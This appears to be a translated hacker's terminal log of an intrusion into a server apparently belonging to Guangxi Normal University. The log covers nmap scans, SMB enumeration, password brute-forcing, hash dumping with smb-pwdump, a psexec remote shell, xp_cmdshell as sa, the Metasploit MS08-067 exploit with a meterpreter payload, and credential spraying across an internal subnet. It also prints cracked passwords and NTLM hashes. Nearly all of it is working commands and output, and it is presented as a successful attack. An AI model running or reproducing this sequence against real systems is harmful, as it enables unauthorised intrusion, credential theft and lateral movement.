Guangxi Normal University website http://202.103.242.241

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names present on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // use msf to exploit MS08-067 on the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to attempt logins across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful: a simple msf + nmap attack.